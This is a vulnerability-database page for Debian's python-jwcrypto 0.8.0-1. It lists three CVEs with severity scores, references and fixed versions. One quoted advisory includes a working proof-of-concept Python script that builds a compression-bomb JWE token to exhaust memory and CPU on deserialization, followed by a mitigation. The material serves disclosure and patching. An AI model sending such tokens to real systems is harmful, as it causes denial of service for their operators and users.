Django REST framework

Lookup for vulnerable packages by Package URL.

Purl pkg:deb/debian/python-jwcrypto@0.8.0-1?distro=trixie

Type deb

Namespace debian

Name python-jwcrypto

Version 0.8.0-1

Qualifiers

distro	trixie

Subpath

Is_vulnerable true

Next_non_vulnerable_version 0.8.0-1+deb11u1

Latest_non_vulnerable_version 1.5.6-1

Affected_by_vulnerabilities

url VCID-3uav-qamf-b7ek

vulnerability_id VCID-3uav-qamf-b7ek

summary A vulnerability was found in JWCrypto. This flaw allows an attacker to cause a denial of service (DoS) attack and possible password brute-force and dictionary attacks to be more resource-intensive. This issue can result in a large amount of computational consumption, causing a denial of service attack.

references

reference_url

https://access.redhat.com/errata/RHSA-2024:3267

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-12T21:27:57Z/

url

https://access.redhat.com/errata/RHSA-2024:3267

reference_url

https://access.redhat.com/errata/RHSA-2024:9281

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-12T21:27:57Z/

url

https://access.redhat.com/errata/RHSA-2024:9281

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-6681.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-6681.json

reference_url

https://access.redhat.com/security/cve/CVE-2023-6681

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-12T21:27:57Z/

url

https://access.redhat.com/security/cve/CVE-2023-6681

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2023-6681

reference_id

reference_type

scores

value	0.00029
scoring_system	epss
scoring_elements	0.08202
published_at	2026-04-18T12:55:00Z

value	0.00029
scoring_system	epss
scoring_elements	0.08286
published_at	2026-04-02T12:55:00Z

value	0.00029
scoring_system	epss
scoring_elements	0.08339
published_at	2026-04-04T12:55:00Z

value	0.00029
scoring_system	epss
scoring_elements	0.08284
published_at	2026-04-07T12:55:00Z

value	0.00029
scoring_system	epss
scoring_elements	0.08348
published_at	2026-04-08T12:55:00Z

value	0.00029
scoring_system	epss
scoring_elements	0.08365
published_at	2026-04-21T12:55:00Z

value	0.00029
scoring_system	epss
scoring_elements	0.08356
published_at	2026-04-11T12:55:00Z

value	0.00029
scoring_system	epss
scoring_elements	0.08336
published_at	2026-04-12T12:55:00Z

value	0.00029
scoring_system	epss
scoring_elements	0.08319
published_at	2026-04-13T12:55:00Z

value	0.00029
scoring_system	epss
scoring_elements	0.08215
published_at	2026-04-16T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2023-6681

reference_url

https://bugzilla.redhat.com/show_bug.cgi?id=2260843

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-12T21:27:57Z/

url

https://bugzilla.redhat.com/show_bug.cgi?id=2260843

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6681
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6681

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/latchset/jwcrypto

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/latchset/jwcrypto

reference_url

https://github.com/latchset/jwcrypto/commit/d2655d370586cb830e49acfb450f87598da60be8

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/latchset/jwcrypto/commit/d2655d370586cb830e49acfb450f87598da60be8

reference_url

https://github.com/pypa/advisory-database/tree/main/vulns/jwcrypto/PYSEC-2024-104.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/pypa/advisory-database/tree/main/vulns/jwcrypto/PYSEC-2024-104.yaml

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:ansible_automation_platform:2
reference_id	cpe:/a:redhat:ansible_automation_platform:2
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:ansible_automation_platform:2

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:8::appstream
reference_id	cpe:/a:redhat:enterprise_linux:8::appstream
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:8::appstream

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:9::appstream
reference_id	cpe:/a:redhat:enterprise_linux:9::appstream
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:enterprise_linux:9::appstream

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7
reference_id	cpe:/o:redhat:enterprise_linux:7
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2023-6681

reference_id

CVE-2023-6681

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2023-6681

reference_url

https://github.com/advisories/GHSA-cw2r-4p82-qv79

reference_id

GHSA-cw2r-4p82-qv79

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-cw2r-4p82-qv79

reference_url

https://github.com/latchset/jwcrypto/security/advisories/GHSA-cw2r-4p82-qv79

reference_id

GHSA-cw2r-4p82-qv79

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/latchset/jwcrypto/security/advisories/GHSA-cw2r-4p82-qv79

fixed_packages

url	pkg:deb/debian/python-jwcrypto@1.5.4-1?distro=trixie
purl	pkg:deb/debian/python-jwcrypto@1.5.4-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@1.5.4-1%3Fdistro=trixie

url	pkg:deb/debian/python-jwcrypto@1.5.6-1?distro=trixie
purl	pkg:deb/debian/python-jwcrypto@1.5.6-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@1.5.6-1%3Fdistro=trixie

aliases CVE-2023-6681, GHSA-cw2r-4p82-qv79, PYSEC-2024-104

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3uav-qamf-b7ek

Fixing_vulnerabilities

url VCID-t87t-re4z-gycu

vulnerability_id VCID-t87t-re4z-gycu

summary The _Rsa15 class in the RSA 1.5 algorithm implementation in jwa.py in jwcrypto before 0.3.2 lacks the Random Filling protection mechanism, which makes it easier for remote attackers to obtain cleartext data via a Million Message Attack (MMA).

references

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2016-6298

reference_id

reference_type

scores

value	0.00365
scoring_system	epss
scoring_elements	0.58408
published_at	2026-04-01T12:55:00Z

value	0.00365
scoring_system	epss
scoring_elements	0.58537
published_at	2026-04-21T12:55:00Z

value	0.00365
scoring_system	epss
scoring_elements	0.58558
published_at	2026-04-18T12:55:00Z

value	0.00365
scoring_system	epss
scoring_elements	0.58554
published_at	2026-04-16T12:55:00Z

value	0.00365
scoring_system	epss
scoring_elements	0.5852
published_at	2026-04-13T12:55:00Z

value	0.00365
scoring_system	epss
scoring_elements	0.5854
published_at	2026-04-12T12:55:00Z

value	0.00365
scoring_system	epss
scoring_elements	0.5856
published_at	2026-04-11T12:55:00Z

value	0.00365
scoring_system	epss
scoring_elements	0.58543
published_at	2026-04-09T12:55:00Z

value	0.00365
scoring_system	epss
scoring_elements	0.58536
published_at	2026-04-08T12:55:00Z

value	0.00365
scoring_system	epss
scoring_elements	0.58484
published_at	2026-04-07T12:55:00Z

value	0.00365
scoring_system	epss
scoring_elements	0.58513
published_at	2026-04-04T12:55:00Z

value	0.00365
scoring_system	epss
scoring_elements	0.58493
published_at	2026-04-02T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2016-6298

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6298
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6298

reference_url

https://github.com/latchset/jwcrypto

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/latchset/jwcrypto

reference_url

https://github.com/latchset/jwcrypto/commit/eb5be5bd94c8cae1d7f3ba9801377084d8e5a7ba

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/latchset/jwcrypto/commit/eb5be5bd94c8cae1d7f3ba9801377084d8e5a7ba

reference_url

https://github.com/latchset/jwcrypto/issues/65

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/latchset/jwcrypto/issues/65

reference_url

https://github.com/latchset/jwcrypto/pull/66

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/latchset/jwcrypto/pull/66

reference_url

https://github.com/latchset/jwcrypto/releases/tag/v0.3.2

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/latchset/jwcrypto/releases/tag/v0.3.2

reference_url

https://github.com/pypa/advisory-database/tree/main/vulns/jwcrypto/PYSEC-2016-4.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/pypa/advisory-database/tree/main/vulns/jwcrypto/PYSEC-2016-4.yaml

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2016-6298

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2016-6298

reference_url

https://web.archive.org/web/20200227230613/http://www.securityfocus.com/bid/92729

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

value	6.0
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://web.archive.org/web/20200227230613/http://www.securityfocus.com/bid/92729

reference_url	http://www.securityfocus.com/bid/92729
reference_id
reference_type
scores
url	http://www.securityfocus.com/bid/92729

reference_url

https://github.com/advisories/GHSA-wg33-x934-3ghh

reference_id

GHSA-wg33-x934-3ghh

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-wg33-x934-3ghh

fixed_packages

url	pkg:deb/debian/python-jwcrypto@0.3.2-1?distro=trixie
purl	pkg:deb/debian/python-jwcrypto@0.3.2-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@0.3.2-1%3Fdistro=trixie

url pkg:deb/debian/python-jwcrypto@0.8.0-1?distro=trixie

purl pkg:deb/debian/python-jwcrypto@0.8.0-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-3uav-qamf-b7ek

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@0.8.0-1%3Fdistro=trixie

url pkg:deb/debian/python-jwcrypto@1.1.0-1%2Bdeb12u1?distro=trixie

purl pkg:deb/debian/python-jwcrypto@1.1.0-1%2Bdeb12u1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-3uav-qamf-b7ek

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@1.1.0-1%252Bdeb12u1%3Fdistro=trixie

url	pkg:deb/debian/python-jwcrypto@1.5.6-1?distro=trixie
purl	pkg:deb/debian/python-jwcrypto@1.5.6-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@1.5.6-1%3Fdistro=trixie

aliases CVE-2016-6298, GHSA-wg33-x934-3ghh, PYSEC-2016-4

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-t87t-re4z-gycu

url VCID-ygj7-qwt8-sud5

vulnerability_id VCID-ygj7-qwt8-sud5

summary

JWCrypto vulnerable to JWT bomb Attack in `deserialize` function
## Affected version
Vendor: https://github.com/latchset/jwcrypto
Version: 1.5.5

## Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.
When the server processes this Token, it will consume a lot of memory and processing time.

## Poc
```python
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty='RSA', size=2048)
public_key.import_key(**json_decode(private_key.export_public()))


payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "zip": "DEF",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)

print("-----uncompress-----")

print(len(enc))

begin = time.time()

jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)

print(time.time() - begin)

print("-----compress-----")

payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)

print(len(enc))

begin = time.time()

jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)

print(time.time() - begin)
```
It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.
<img width="172" alt="image" src="https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785">



## Mitigation
To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also
been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing
attackers from exploiting this vulnerability with high compression ratio tokens.

## References
[1] [CVE-2024-21319](https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-8g9c-28fc-mcx2)

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-28102.json

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-28102.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2024-28102

reference_id

reference_type

scores

value	0.0036
scoring_system	epss
scoring_elements	0.5822
published_at	2026-04-21T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59567
published_at	2026-04-11T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59485
published_at	2026-04-07T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59518
published_at	2026-04-04T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59493
published_at	2026-04-02T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59532
published_at	2026-04-13T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59552
published_at	2026-04-12T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59548
published_at	2026-04-09T12:55:00Z

value	0.00381
scoring_system	epss
scoring_elements	0.59536
published_at	2026-04-08T12:55:00Z

value	0.00392
scoring_system	epss
scoring_elements	0.60219
published_at	2026-04-16T12:55:00Z

value	0.00392
scoring_system	epss
scoring_elements	0.60226
published_at	2026-04-18T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2024-28102

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28102
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28102

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/latchset/jwcrypto

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/latchset/jwcrypto

reference_url

https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:56:39Z/

url

https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f

reference_url

https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:56:39Z/

url

https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97

reference_url

https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2024-28102

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2024-28102

reference_url

https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103

reference_id

reference_type

scores

value	6.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065688
reference_id	1065688
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1065688

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2268758
reference_id	2268758
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2268758

reference_url

https://github.com/advisories/GHSA-j857-7rvv-vj97

reference_id

GHSA-j857-7rvv-vj97

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-j857-7rvv-vj97

reference_url	https://access.redhat.com/errata/RHSA-2024:2559
reference_id	RHSA-2024:2559
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:2559

reference_url	https://access.redhat.com/errata/RHSA-2024:4522
reference_id	RHSA-2024:4522
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:4522

fixed_packages

url pkg:deb/debian/python-jwcrypto@0.8.0-1?distro=trixie

purl pkg:deb/debian/python-jwcrypto@0.8.0-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-3uav-qamf-b7ek

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@0.8.0-1%3Fdistro=trixie

url	pkg:deb/debian/python-jwcrypto@0.8.0-1%2Bdeb11u1?distro=trixie
purl	pkg:deb/debian/python-jwcrypto@0.8.0-1%2Bdeb11u1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@0.8.0-1%252Bdeb11u1%3Fdistro=trixie

url pkg:deb/debian/python-jwcrypto@1.1.0-1%2Bdeb12u1?distro=trixie

purl pkg:deb/debian/python-jwcrypto@1.1.0-1%2Bdeb12u1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-3uav-qamf-b7ek

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@1.1.0-1%252Bdeb12u1%3Fdistro=trixie

url	pkg:deb/debian/python-jwcrypto@1.5.6-1?distro=trixie
purl	pkg:deb/debian/python-jwcrypto@1.5.6-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@1.5.6-1%3Fdistro=trixie

aliases CVE-2024-28102, GHSA-j857-7rvv-vj97

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ygj7-qwt8-sud5

Risk_score 3.1

Resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-jwcrypto@0.8.0-1%3Fdistro=trixie

Package Instance